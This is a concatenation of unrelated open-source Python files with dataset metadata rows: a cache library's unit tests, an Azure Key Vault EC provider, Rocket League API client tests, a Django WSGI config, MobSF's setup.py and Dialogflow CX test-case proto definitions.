self.assertEqual(len(a), 1, msg)
def testBacking(self):
"""Test the backing mechanism. Keys will be (x, y) form."""
# create the test directory
test_dir = './_#test_dir#_'
shutil.rmtree(test_dir, ignore_errors=True)
os.mkdir(test_dir)
# override the backing functions in pyCacheBack
class my_cache(pyCacheBack):
def _put_to_back(self, key, value):
(x, y) = key
dir_path = os.path.join(self._backing_dir, str(x))
try:
os.mkdir(dir_path)
except OSError:
pass
file_path = os.path.join(dir_path, str(y))
with open(file_path, 'wb') as f:
f.write(bytes(value, encoding='utf-8'))
def _get_from_back(self, key):
(x, y) = key
file_path = os.path.join(self._backing_dir, str(x), str(y))
try:
with open(file_path, 'rb') as f:
value = f.read()
except IOError:
raise KeyError(str(key))
return value
# define utility testing function
def check_file(self, file_path, expected_contents):
if not os.path.isfile(file_path):
self.fail("File %s doesn't exist!?" % file_path)
with open(file_path, 'rb') as f:
file_contents = f.read().decode("utf-8")
if file_contents != expected_contents:
self.fail("Expected file contents '%s', got '%s'"
% (expected_contents, file_contents))
# OK, test it
a = my_cache(backing_dir=test_dir, max_lru=2)
a[(1,1)] = 'one and one'
a[(1,2)] = 'one and two'
a[(1,1)] = 'one and one, second value' # redefine (1,1) value
# test if backing files are as expected
check_file(self, os.path.join(test_dir, '1', '1'), a[(1,1)])
check_file(self, os.path.join(test_dir, '1', '2'), a[(1,2)])
# add third key, flushing (1,2), check backing file still there
a[(1,3)] = 'one, three'
check_file(self, os.path.join(test_dir, '1', '2'), a[(1,2)])
# check that we can still get (1,2) data from backing store
msg = "a[(1,2)] != 'one and two'!"
self.assertEqual(a[(1,2)], 'one and two', msg)
# delete a key, ensure gone & check backing file still there
del a[(1,3)]
check_file(self, os.path.join(test_dir, '1', '3'),
'one, three')
# clean up
shutil.rmtree(test_dir)
def testIter(self):
kv_list = [(1, 'one'), (2, 2), (3, 3.0)]
a = pyCacheBack(kv_list, max_lru=10)
for i, x in enumerate(iter(a)):
msg = "'%d'th key should be %d, got %s" % (i+1, kv_list[i][0], x)
self.assertEqual(kv_list[i][0], x, msg)
def testCopy(self):
kv_list = [(1, 'one'), (2, 2), (3, 3.0)]
a = pyCacheBack(kv_list, max_lru=10)
b = a.copy()
msg = 'Length of copied dict should be %d, got %d' % (len(a), len(b))
self.assertEqual(len(b), len(a), msg)
# change element of 'a', see if 'b' gets it
orig = b[2]
a[2] = 'test'
_ = a[3]
msg = "copy: b[2] should be %s, got %s" % (orig, str(b[2]))
self.assertEqual(b[2], orig, msg)
def testClear(self):
kv_list = [(1, 'one'), (2, 2), (3, 3.0)]
a = pyCacheBack(kv_list, max_lru=10)
msg = 'Length before should be %d, got %d' % (len(kv_list), len(a))
self.assertEqual(len(a), len(kv_list), msg)
a.clear()
msg = 'Length after should be 0, got %d' % len(a)
self.assertEqual(len(a), 0, msg)
# check LRU list is empty
msg = ".clear() didn't empty ._lru_list, it's '%s'" % str(a._lru_list)
self.assertEqual([], a._lru_list, msg)
def testGet(self):
kv_list = [(1, 'one'), (2, 2), (3, 3.0)]
a = pyCacheBack(kv_list, max_lru=10)
msg = (".get(1) should return '%s', got '%s'"
% (str(kv_list[1][0]), str(a.get(1))))
self.assertEqual(a.get(1), 'one', msg)
def testHasKey(self):
kv_list = [(1, 'one'), (2, 2), (3, 3.0)]
a = pyCacheBack(kv_list, max_lru=10)
msg = ".has_key(1) should return True, got '%s'" % str(1 in a) #a.has_key(1))
self.assertEqual(1 in a, True, msg)
msg = (".has_key(100) should return False, got '%s'"
% str(100 in a))
self.assertEqual(100 in a, False, msg)
self.assertEqual(1 in a, True, msg)
def testItems(self):
kv_list = [(1, 'one'), (2, 2), (3, 3.0)]
a = pyCacheBack(kv_list, max_lru=10)
expected = str(kv_list)
msg = (".items() should return '%s', got '%s'"
% (expected, str(a.items())))
self.assertEqual(expected, str(a.items()), msg)
    def testIteritems(self):
kv_list = [(1, 'one'), (2, 2), (3, 3.0)]
a = pyCacheBack(kv_list, max_lru=10)
for i, x in enumerate(a.items()):
msg = (".iteritems() item %d should be '%s', got '%s'"
% (i, str(kv_list[i]), str(x)))
self.assertEqual(kv_list[i], x, msg)
def testItervalues(self):
kv_list = [(1, 'one'), (2, 2), (3, 3.0)]
a = pyCacheBack(kv_list, max_lru=10)
for i, x in enumerate(a.itervalues()):
msg = (".itervalues() item %d should be '%s', got '%s'"
% (i, str(kv_list[i][1]), str(x)))
self.assertEqual(kv_list[i][1], x, msg)
    def testKeys(self):
kv_list = [(1, 'one'), (2, 2), (3, 3.0)]
a = pyCacheBack(kv_list, max_lru=10)
k_list = [x[0] for x in kv_list]
msg = ".keys() should be '%s', got '%s'" % (str(k_list), str(a.keys()))
self.assertEqual(k_list, list(a.keys()), msg)
def testPop(self):
kv_list = [(1, 'one'), (2, 2), (3, 3.0)]
a = pyCacheBack(kv_list, max_lru=10)
random.shuffle(kv_list)
for (k, v) in kv_list:
_ = a[k]
expected_lru_len = len(a._lru_list)
for (k, v) in kv_list:
value = a.pop(k, None)
msg = (".pop(%s) should return '%s', got '%s'"
% (str(k), str(v), str(value)))
self.assertEqual(v, value, msg)
expected_lru_len = expected_lru_len - 1
msg = (".pop(%s) should leave dict with len(LRU)=%d, got %d"
% (str(k), expected_lru_len, len(a._lru_list)))
self.assertEqual(len(a._lru_list), expected_lru_len, msg)
def testPopitem(self):
kv_list = [(1, 'one'), (2, 2), (3, 3.0)]
a = pyCacheBack(kv_list, max_lru=10)
# get a big LRU list
shuffle_kv_list = copy.deepcopy(kv_list)
random.shuffle(shuffle_kv_list)
for (k, v) in shuffle_kv_list:
_ = a[k]
a_len = len(a)
lru_len = len(a._lru_list)
for i in range(a_len):
(k, v) = a.popitem()
msg = (".popitem() returned '%s', shouldn't be in dict?"
% str((k, v)))
self.assertIn((k, v), kv_list, msg)
msg = ".popitem() all done, len should be 0, got %d" % len(a)
self.assertEqual(len(a), 0, msg)
msg = (".popitem() all done, ._lru_list should be [], got '%s'"
% str(a._lru_list))
self.assertEqual(a._lru_list, [], msg)
def testSetdefault(self):
kv_list = [(1, 'one'), (2, 2), (3, 3.0)]
a = pyCacheBack(kv_list, max_lru=10)
ret_val = a.setdefault(100, True)
msg = ".setdefault(100, True) should return True, got %s" % str(ret_val)
self.assertEqual(ret_val, True, msg)
def testUpdate(self):
kv_list = [(1, 'one'), (2, 2), (3, 3.0)]
a = pyCacheBack(kv_list, max_lru=10)
kv_update = [(4, '****'), (5, 'V')]
a.update(kv_update)
expected_len = len(kv_list) + len(kv_update)
msg = (".update() should create length %d, got length %d"
% (expected_len, len(a)))
self.assertEqual(expected_len, len(a), msg)
# check actual contents
full_list = kv_list + kv_update
b = pyCacheBack(full_list, max_lru=10)
msg = ".update() didn't work, got dict '%s'" % str(a)
self.assertEqual(b, a, msg)
def testValues(self):
kv_list = [(1, 'one'), (2, 2), (3, 3.0)]
a = pyCacheBack(kv_list, max_lru=10)
expected_values = [kv[1] for kv in kv_list]
msg = (".values should return '%s', got '%s'"
% (str(expected_values), str(a.values())))
self.assertEqual(expected_values, list(a.values()), msg)
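# A hedged sketch, not part of the original test suite: the smallest
# pyCacheBack subclass with a one-file-per-key backing store, mirroring the
# my_cache helper in testBacking above. It assumes str-able keys and bytes
# values; the backing_dir path is supplied by the caller.
def _example_disk_cache(backing_dir):
    class DiskCache(pyCacheBack):
        def _put_to_back(self, key, value):
            # persist each value under a file named after its key
            with open(os.path.join(backing_dir, str(key)), 'wb') as f:
                f.write(value)
        def _get_from_back(self, key):
            # missing file means the key was never cached: raise KeyError
            try:
                with open(os.path.join(backing_dir, str(key)), 'rb') as f:
                    return f.read()
            except IOError:
                raise KeyError(str(key))
    return DiskCache(backing_dir=backing_dir, max_lru=2)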
if __name__ == '__main__':
    unittest.main()
| mit | 4,153,113,871,764,167,700 | 36.84596 | 85 | 0.506639 | false |
Azure/azure-sdk-for-python | sdk/keyvault/azure-keyvault-keys/azure/keyvault/keys/crypto/_providers/ec.py | 1 | 1586 | # ------------------------------------
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
# ------------------------------------
from typing import TYPE_CHECKING
from .local_provider import LocalCryptographyProvider
from .._internal import EllipticCurveKey
from ... import KeyOperation, KeyType
if TYPE_CHECKING:
# pylint:disable=unused-import
from .local_provider import Algorithm
from .._internal import Key
from ... import JsonWebKey
_PRIVATE_KEY_OPERATIONS = frozenset((KeyOperation.decrypt, KeyOperation.sign, KeyOperation.unwrap_key))
class EllipticCurveCryptographyProvider(LocalCryptographyProvider):
def _get_internal_key(self, key):
# type: (JsonWebKey) -> Key
if key.kty not in (KeyType.ec, KeyType.ec_hsm):
raise ValueError('"key" must be an EC or EC-HSM key')
return EllipticCurveKey.from_jwk(key)
def supports(self, operation, algorithm):
# type: (KeyOperation, Algorithm) -> bool
if operation in _PRIVATE_KEY_OPERATIONS and not self._internal_key.is_private_key():
return False
if operation in (KeyOperation.decrypt, KeyOperation.encrypt):
return algorithm in self._internal_key.supported_encryption_algorithms
if operation in (KeyOperation.unwrap_key, KeyOperation.wrap_key):
return algorithm in self._internal_key.supported_key_wrap_algorithms
if operation in (KeyOperation.sign, KeyOperation.verify):
return algorithm in self._internal_key.supported_signature_algorithms
return False
| mit | -6,501,464,077,499,256,000 | 41.864865 | 103 | 0.680958 | false |
Drummersbrother/rocket-snake | tests/experiments.py | 1 | 7041 | import asyncio
import json
import time
import unittest
from pprint import pprint
import rocket_snake
with open("tests/config.json", "r") as config_file:
config = json.load(config_file)
def async_test(f):
def wrapper(*args, **kwargs):
future = f(*args, **kwargs)
loop = args[0].running_loop
loop.run_until_complete(future)
return wrapper
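# A hedged usage sketch, not in the original file: async_test assumes the
# decorated coroutine method's first positional argument is a test instance
# exposing ``running_loop``, which AsyncTester below provides.
#
#     class ExampleTest(AsyncTester):
#         @async_test
#         async def test_noop(self):
#             await asyncio.sleep(0)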
class AsyncTester(unittest.TestCase):
"""Test async code easily by inheriting from this."""
@staticmethod
def _do_async_code(coro):
return asyncio.get_event_loop().run_until_complete(coro)
def setUp(self, *args, **kwargs):
super().setUp()
self.running_loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.running_loop)
self.time_track_stack = []
def tearDown(self, *args, **kwargs):
super().setUp()
if not self.running_loop.is_closed():
self.running_loop.close()
def time_track(self, text: object="Time taken was {0} seconds."):
if text is None:
self.time_track_stack.append(time.time())
else:
last_time = self.time_track_stack.pop()
time_delta = time.time() - last_time
print(text.format(round(time_delta, 3)))
return time_delta
class Tester(AsyncTester):
def setUp(self, *args, **kwargs):
super().setUp(*args, **kwargs)
self.executed_requests = 0
async def do_multiple(self, func, times: int = 10, text: str = "Time taken was {0} seconds."):
self.time_track(None)
tasks = [func() for i in range(times)]
tasks = await asyncio.gather(*tasks, loop=asyncio.get_event_loop(), return_exceptions=False)
gather_time = self.time_track("Time taken for {0} gather tasks was ".format(times) + "{0} seconds.")
print("That means an average of {0} milliseconds per gather request.".format(
round(1000 * (gather_time / times), 1)))
total_series_time = 0
for i in range(times):
self.time_track(None)
await func()
total_series_time += self.time_track(text)
print("Time taken for {0} series tasks was {1} seconds.".format(times, round(total_series_time, 3)))
print("That means an average of {0} milliseconds per series request.".format(
round(1000 * (total_series_time / times), 1)))
return times * 2
@async_test
async def test_data_endpoints(self):
self.time_track(None)
print("Testing data endpoints.")
client = rocket_snake.RLS_Client(api_key=config["key"], auto_rate_limit=True)
print("Playlists:")
pprint(await client.get_playlists())
print("\nSeasons:")
pprint(await client.get_seasons())
print("\nPlatforms:")
pprint(await client.get_platforms())
print("\nTiers:")
pprint(await client.get_tiers())
print("\n")
self.executed_requests += 7
print("Done with testing data endpoints. Time taken was {0} seconds.".format(self.time_track("Time taken for data endpoints was {0} seconds.")))
@async_test
async def test_player_search(self):
self.time_track(None)
print("Testing player search.")
client = rocket_snake.RLS_Client(api_key=config["key"], auto_rate_limit=True)
pprint(await client.search_player("Mike", get_all=False))
print("Done with testing player search. Time taken was {0} seconds.".format(self.time_track("Time taken for player search was {0} seconds.")))
@async_test
async def test_player_endpoints(self):
self.time_track(None)
print("Testing player endpoints.")
client = rocket_snake.RLS_Client(api_key=config["key"], auto_rate_limit=True)
pprint(await client.search_player("Mike", get_all=False))
print("Me:")
self.time_track(None)
print(str(await client.get_player(config["steam_ids"][0], rocket_snake.constants.STEAM)))
self.time_track("Time taken for single player was {0} seconds.")
print("Loads a people:")
self.time_track(None)
pprint(await client.get_players(
list(zip(config["steam_ids"], [rocket_snake.constants.STEAM] * len(config["steam_ids"])))))
self.time_track("Time taken for batch players was {0} seconds.")
print("Done with testing player endpoints. Time taken was {0} seconds.§".format(self.time_track("Time taken for player endpoints was {0} seconds.")))
@async_test
async def test_platforms_throughput(self):
self.time_track(None)
print("Testing platforms data throughput.")
client = rocket_snake.RLS_Client(api_key=config["key"], auto_rate_limit=True)
done_requests = await self.do_multiple(client.get_platforms, text="Platforms took {0} seconds.")
print("Done with platforms data throughput testing, {0} requests were executed. \nThat means an average of {1} milliseconds per request."
.format(done_requests, round(1000 * (self.time_track("Time taken for platforms data throughput was {0} seconds.") / done_requests), 1)))
@async_test
async def test_tiers_throughput(self):
self.time_track(None)
print("Testing tiers data throughput.")
client = rocket_snake.RLS_Client(api_key=config["key"], auto_rate_limit=True)
done_requests = await self.do_multiple(client.get_tiers, text="tiers took {0} seconds.")
print("Done with tiers data throughput testing, {0} requests were executed. \nThat means an average of {1} milliseconds per request."
.format(done_requests, round(1000 * (self.time_track("Time taken for tiers data throughput was {0} seconds.") / done_requests), 1)))
@async_test
async def test_seasons_throughput(self):
self.time_track(None)
print("Testing seasons data throughput.")
client = rocket_snake.RLS_Client(api_key=config["key"], auto_rate_limit=True)
done_requests = await self.do_multiple(client.get_seasons, text="seasons took {0} seconds.")
print("Done with seasons data throughput testing, {0} requests were executed. \nThat means an average of {1} milliseconds per request."
.format(done_requests, round(1000 * (self.time_track("Time taken for seasons data throughput was {0} seconds.") / done_requests), 1)))
@async_test
async def test_playlists_throughput(self):
self.time_track(None)
print("Testing playlists data throughput.")
client = rocket_snake.RLS_Client(api_key=config["key"], auto_rate_limit=True)
done_requests = await self.do_multiple(client.get_playlists, text="playlists took {0} seconds.")
print("Done with playlists data throughput testing, {0} requests were executed. \nThat means an average of {1} milliseconds per request."
.format(done_requests, round(1000 * (self.time_track("Time taken for playlists data throughput was {0} seconds.") / done_requests), 1)))
| apache-2.0 | -4,465,343,280,217,194,500 | 37.26087 | 157 | 0.640767 | false |
yzheng624/Doolittle | doolittle/wsgi.py | 1 | 1428 | """
WSGI config for doolittle project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
# We defer to a DJANGO_SETTINGS_MODULE already in the environment. This breaks
# if running multiple sites in the same mod_wsgi process. To fix this, use
# mod_wsgi daemon mode with each site in its own daemon process, or use
# os.environ["DJANGO_SETTINGS_MODULE"] = "doolittle.settings"
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "doolittle.settings")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
| mit | -3,612,763,795,554,017,300 | 43.625 | 79 | 0.794118 | false |
MobSF/Mobile-Security-Framework-MobSF | setup.py | 1 | 1749 | #!/usr/bin/env python3
"""Setup for MobSF."""
from setuptools import (
find_packages,
setup,
)
from pathlib import Path
def read(rel_path):
init = Path(__file__).resolve().parent / rel_path
return init.read_text('utf-8', 'ignore')
def get_version():
ver_path = 'mobsf/MobSF/init.py'
for line in read(ver_path).splitlines():
if line.startswith('VERSION'):
return line.split('\'')[1]
raise RuntimeError('Unable to find version string.')
description = (
'Mobile Security Framework (MobSF) is an automated,'
' all-in-one mobile application (Android/iOS/Windows) pen-testing,'
' malware analysis and security assessment framework capable of '
'performing static and dynamic analysis.')
setup(
name='mobsf',
version=get_version(),
description=description,
author='Ajin Abraham',
author_email='[email protected]',
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',
'Programming Language :: Python :: 3.8',
'Topic :: Security',
'Topic :: Software Development :: Quality Assurance',
],
packages=find_packages(include=[
'mobsf', 'mobsf.*',
]),
include_package_data=True,
    python_requires='>=3.8,<=3.9',
entry_points={
'console_scripts': [
'mobsf = mobsf.__main__:main',
'mobsfdb = mobsf.__main__:db',
],
},
url='https://github.com/MobSF/Mobile-Security-Framework-MobSF',
long_description=read('README.md'),
long_description_content_type='text/markdown',
install_requires=Path('requirements.txt').read_text().splitlines(),
)
| gpl-3.0 | -4,701,759,006,805,439,000 | 27.672131 | 75 | 0.621498 | false |
googleapis/python-dialogflow-cx | google/cloud/dialogflowcx_v3/types/test_case.py | 1 | 37121 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
from google.cloud.dialogflowcx_v3.types import flow as gcdc_flow
from google.cloud.dialogflowcx_v3.types import intent as gcdc_intent
from google.cloud.dialogflowcx_v3.types import page as gcdc_page
from google.cloud.dialogflowcx_v3.types import response_message
from google.cloud.dialogflowcx_v3.types import session
from google.cloud.dialogflowcx_v3.types import transition_route_group
from google.protobuf import field_mask_pb2 # type: ignore
from google.protobuf import struct_pb2 # type: ignore
from google.protobuf import timestamp_pb2 # type: ignore
from google.rpc import status_pb2 # type: ignore
__protobuf__ = proto.module(
package="google.cloud.dialogflow.cx.v3",
manifest={
"TestResult",
"TestCase",
"TestCaseResult",
"TestConfig",
"ConversationTurn",
"TestRunDifference",
"TransitionCoverage",
"TransitionRouteGroupCoverage",
"IntentCoverage",
"CalculateCoverageRequest",
"CalculateCoverageResponse",
"ListTestCasesRequest",
"ListTestCasesResponse",
"BatchDeleteTestCasesRequest",
"CreateTestCaseRequest",
"UpdateTestCaseRequest",
"GetTestCaseRequest",
"RunTestCaseRequest",
"RunTestCaseResponse",
"RunTestCaseMetadata",
"BatchRunTestCasesRequest",
"BatchRunTestCasesResponse",
"BatchRunTestCasesMetadata",
"TestError",
"ImportTestCasesRequest",
"ImportTestCasesResponse",
"ImportTestCasesMetadata",
"TestCaseError",
"ExportTestCasesRequest",
"ExportTestCasesResponse",
"ExportTestCasesMetadata",
"ListTestCaseResultsRequest",
"ListTestCaseResultsResponse",
"GetTestCaseResultRequest",
},
)
class TestResult(proto.Enum):
r"""The test result for a test case and an agent environment."""
TEST_RESULT_UNSPECIFIED = 0
PASSED = 1
FAILED = 2
class TestCase(proto.Message):
r"""Represents a test case.
Attributes:
name (str):
The unique identifier of the test case.
[TestCases.CreateTestCase][google.cloud.dialogflow.cx.v3.TestCases.CreateTestCase]
will populate the name automatically. Otherwise use format:
``projects/<Project ID>/locations/<LocationID>/agents/ <AgentID>/testCases/<TestCase ID>``.
tags (Sequence[str]):
Tags are short descriptions that users may
apply to test cases for organizational and
filtering purposes. Each tag should start with
"#" and has a limit of 30 characters.
display_name (str):
Required. The human-readable name of the test
case, unique within the agent. Limit of 200
characters.
notes (str):
Additional freeform notes about the test
case. Limit of 400 characters.
test_config (google.cloud.dialogflowcx_v3.types.TestConfig):
Config for the test case.
test_case_conversation_turns (Sequence[google.cloud.dialogflowcx_v3.types.ConversationTurn]):
The conversation turns uttered when the test
case was created, in chronological order. These
include the canonical set of agent utterances
that should occur when the agent is working
properly.
creation_time (google.protobuf.timestamp_pb2.Timestamp):
Output only. When the test was created.
last_test_result (google.cloud.dialogflowcx_v3.types.TestCaseResult):
The latest test result.
"""
name = proto.Field(proto.STRING, number=1,)
tags = proto.RepeatedField(proto.STRING, number=2,)
display_name = proto.Field(proto.STRING, number=3,)
notes = proto.Field(proto.STRING, number=4,)
test_config = proto.Field(proto.MESSAGE, number=13, message="TestConfig",)
test_case_conversation_turns = proto.RepeatedField(
proto.MESSAGE, number=5, message="ConversationTurn",
)
creation_time = proto.Field(
proto.MESSAGE, number=10, message=timestamp_pb2.Timestamp,
)
last_test_result = proto.Field(proto.MESSAGE, number=12, message="TestCaseResult",)
class TestCaseResult(proto.Message):
r"""Represents a result from running a test case in an agent
environment.
Attributes:
name (str):
The resource name for the test case result. Format:
``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>/testCases/ <TestCase ID>/results/<TestCaseResult ID>``.
environment (str):
Environment where the test was run. If not
set, it indicates the draft environment.
conversation_turns (Sequence[google.cloud.dialogflowcx_v3.types.ConversationTurn]):
The conversation turns uttered during the
test case replay in chronological order.
test_result (google.cloud.dialogflowcx_v3.types.TestResult):
Whether the test case passed in the agent
environment.
test_time (google.protobuf.timestamp_pb2.Timestamp):
The time that the test was run.
"""
name = proto.Field(proto.STRING, number=1,)
environment = proto.Field(proto.STRING, number=2,)
conversation_turns = proto.RepeatedField(
proto.MESSAGE, number=3, message="ConversationTurn",
)
test_result = proto.Field(proto.ENUM, number=4, enum="TestResult",)
test_time = proto.Field(proto.MESSAGE, number=5, message=timestamp_pb2.Timestamp,)
class TestConfig(proto.Message):
r"""Represents configurations for a test case.
Attributes:
tracking_parameters (Sequence[str]):
Session parameters to be compared when
calculating differences.
flow (str):
Flow name. If not set, default start flow is assumed.
Format:
``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>/flows/<Flow ID>``.
"""
tracking_parameters = proto.RepeatedField(proto.STRING, number=1,)
flow = proto.Field(proto.STRING, number=2,)
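# A hedged sketch, not part of the generated module: proto-plus messages
# accept their fields as keyword arguments, so a TestConfig can be built
# directly; the flow resource name below is a made-up placeholder.
#
#     config = TestConfig(
#         tracking_parameters=["order_id"],
#         flow="projects/p/locations/l/agents/a/flows/f",
#     )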
class ConversationTurn(proto.Message):
r"""One interaction between a human and virtual agent. The human
provides some input and the virtual agent provides a response.
Attributes:
user_input (google.cloud.dialogflowcx_v3.types.ConversationTurn.UserInput):
The user input.
virtual_agent_output (google.cloud.dialogflowcx_v3.types.ConversationTurn.VirtualAgentOutput):
The virtual agent output.
"""
class UserInput(proto.Message):
r"""The input from the human user.
Attributes:
input (google.cloud.dialogflowcx_v3.types.QueryInput):
Supports [text
input][google.cloud.dialogflow.cx.v3.QueryInput.text],
[event
input][google.cloud.dialogflow.cx.v3.QueryInput.event],
[dtmf input][google.cloud.dialogflow.cx.v3.QueryInput.dtmf]
in the test case.
injected_parameters (google.protobuf.struct_pb2.Struct):
Parameters that need to be injected into the
conversation during intent detection.
is_webhook_enabled (bool):
If webhooks should be allowed to trigger in
response to the user utterance. Often if
parameters are injected, webhooks should not be
enabled.
enable_sentiment_analysis (bool):
Whether sentiment analysis is enabled.
"""
input = proto.Field(proto.MESSAGE, number=5, message=session.QueryInput,)
injected_parameters = proto.Field(
proto.MESSAGE, number=2, message=struct_pb2.Struct,
)
is_webhook_enabled = proto.Field(proto.BOOL, number=3,)
enable_sentiment_analysis = proto.Field(proto.BOOL, number=7,)
class VirtualAgentOutput(proto.Message):
r"""The output from the virtual agent.
Attributes:
session_parameters (google.protobuf.struct_pb2.Struct):
The session parameters available to the bot
at this point.
differences (Sequence[google.cloud.dialogflowcx_v3.types.TestRunDifference]):
Output only. If this is part of a [result conversation
turn][TestCaseResult.conversation_turns], the list of
differences between the original run and the replay for this
output, if any.
diagnostic_info (google.protobuf.struct_pb2.Struct):
Required. Input only. The diagnostic
[info][Session.DetectIntentResponse.QueryResult.diagnostic_info]
output for the turn.
triggered_intent (google.cloud.dialogflowcx_v3.types.Intent):
The [Intent][google.cloud.dialogflow.cx.v3.Intent] that
triggered the response. Only name and displayName will be
set.
current_page (google.cloud.dialogflowcx_v3.types.Page):
The [Page][google.cloud.dialogflow.cx.v3.Page] on which the
utterance was spoken. Only name and displayName will be set.
text_responses (Sequence[google.cloud.dialogflowcx_v3.types.ResponseMessage.Text]):
The
[text][google.cloud.dialogflow.cx.v3.ResponseMessage.Text]
responses from the agent for the turn.
status (google.rpc.status_pb2.Status):
Response error from the agent in the test
result. If set, other output is empty.
"""
session_parameters = proto.Field(
proto.MESSAGE, number=4, message=struct_pb2.Struct,
)
differences = proto.RepeatedField(
proto.MESSAGE, number=5, message="TestRunDifference",
)
diagnostic_info = proto.Field(
proto.MESSAGE, number=6, message=struct_pb2.Struct,
)
triggered_intent = proto.Field(
proto.MESSAGE, number=7, message=gcdc_intent.Intent,
)
current_page = proto.Field(proto.MESSAGE, number=8, message=gcdc_page.Page,)
text_responses = proto.RepeatedField(
proto.MESSAGE, number=9, message=response_message.ResponseMessage.Text,
)
status = proto.Field(proto.MESSAGE, number=10, message=status_pb2.Status,)
user_input = proto.Field(proto.MESSAGE, number=1, message=UserInput,)
virtual_agent_output = proto.Field(
proto.MESSAGE, number=2, message=VirtualAgentOutput,
)
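# A hedged sketch, not part of the generated module: nested message types
# are addressed through the enclosing class; the utterance and settings
# below are placeholders.
#
#     turn = ConversationTurn(
#         user_input=ConversationTurn.UserInput(
#             input=session.QueryInput(
#                 text=session.TextInput(text="hi"),
#                 language_code="en",
#             ),
#             is_webhook_enabled=False,
#         ),
#     )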
class TestRunDifference(proto.Message):
r"""The description of differences between original and replayed
agent output.
Attributes:
type_ (google.cloud.dialogflowcx_v3.types.TestRunDifference.DiffType):
The type of diff.
description (str):
A description of the diff, showing the actual
output vs expected output.
"""
class DiffType(proto.Enum):
r"""What part of the message replay differs from the test case."""
DIFF_TYPE_UNSPECIFIED = 0
INTENT = 1
PAGE = 2
PARAMETERS = 3
UTTERANCE = 4
type_ = proto.Field(proto.ENUM, number=1, enum=DiffType,)
description = proto.Field(proto.STRING, number=2,)
class TransitionCoverage(proto.Message):
r"""Transition coverage represents the percentage of all possible
page transitions (page-level transition routes and event
handlers, excluding transition route groups) present within any
of a parent's test cases.
Attributes:
transitions (Sequence[google.cloud.dialogflowcx_v3.types.TransitionCoverage.Transition]):
The list of Transitions present in the agent.
coverage_score (float):
The percent of transitions in the agent that
are covered.
"""
class TransitionNode(proto.Message):
r"""The source or target of a transition.
Attributes:
page (google.cloud.dialogflowcx_v3.types.Page):
Indicates a transition to a
[Page][google.cloud.dialogflow.cx.v3.Page]. Only some fields
such as name and displayname will be set.
flow (google.cloud.dialogflowcx_v3.types.Flow):
Indicates a transition to a
[Flow][google.cloud.dialogflow.cx.v3.Flow]. Only some fields
such as name and displayname will be set.
"""
page = proto.Field(
proto.MESSAGE, number=1, oneof="kind", message=gcdc_page.Page,
)
flow = proto.Field(
proto.MESSAGE, number=2, oneof="kind", message=gcdc_flow.Flow,
)
class Transition(proto.Message):
r"""A transition in a page.
Attributes:
source (google.cloud.dialogflowcx_v3.types.TransitionCoverage.TransitionNode):
The start node of a transition.
index (int):
The index of a transition in the transition
list. Starting from 0.
target (google.cloud.dialogflowcx_v3.types.TransitionCoverage.TransitionNode):
The end node of a transition.
covered (bool):
Whether or not the transition is covered by
at least one of the agent's test cases.
transition_route (google.cloud.dialogflowcx_v3.types.TransitionRoute):
Intent route or condition route.
event_handler (google.cloud.dialogflowcx_v3.types.EventHandler):
Event handler.
"""
source = proto.Field(
proto.MESSAGE, number=1, message="TransitionCoverage.TransitionNode",
)
index = proto.Field(proto.INT32, number=4,)
target = proto.Field(
proto.MESSAGE, number=2, message="TransitionCoverage.TransitionNode",
)
covered = proto.Field(proto.BOOL, number=3,)
transition_route = proto.Field(
proto.MESSAGE, number=5, oneof="detail", message=gcdc_page.TransitionRoute,
)
event_handler = proto.Field(
proto.MESSAGE, number=6, oneof="detail", message=gcdc_page.EventHandler,
)
transitions = proto.RepeatedField(proto.MESSAGE, number=1, message=Transition,)
coverage_score = proto.Field(proto.FLOAT, number=2,)
class TransitionRouteGroupCoverage(proto.Message):
r"""Transition route group coverage represents the percentage of
all possible transition routes present within any of a parent's
test cases. The results are grouped by the transition route
group.
Attributes:
coverages (Sequence[google.cloud.dialogflowcx_v3.types.TransitionRouteGroupCoverage.Coverage]):
Transition route group coverages.
coverage_score (float):
The percent of transition routes in all the
transition route groups that are covered.
"""
class Coverage(proto.Message):
r"""Coverage result message for one transition route group.
Attributes:
route_group (google.cloud.dialogflowcx_v3.types.TransitionRouteGroup):
Transition route group metadata. Only name
and displayName will be set.
transitions (Sequence[google.cloud.dialogflowcx_v3.types.TransitionRouteGroupCoverage.Coverage.Transition]):
The list of transition routes and coverage in
the transition route group.
coverage_score (float):
The percent of transition routes in the
transition route group that are covered.
"""
class Transition(proto.Message):
r"""A transition coverage in a transition route group.
Attributes:
transition_route (google.cloud.dialogflowcx_v3.types.TransitionRoute):
Intent route or condition route.
covered (bool):
Whether or not the transition route is
covered by at least one of the agent's test
cases.
"""
transition_route = proto.Field(
proto.MESSAGE, number=1, message=gcdc_page.TransitionRoute,
)
covered = proto.Field(proto.BOOL, number=2,)
route_group = proto.Field(
proto.MESSAGE,
number=1,
message=transition_route_group.TransitionRouteGroup,
)
transitions = proto.RepeatedField(
proto.MESSAGE,
number=2,
message="TransitionRouteGroupCoverage.Coverage.Transition",
)
coverage_score = proto.Field(proto.FLOAT, number=3,)
coverages = proto.RepeatedField(proto.MESSAGE, number=1, message=Coverage,)
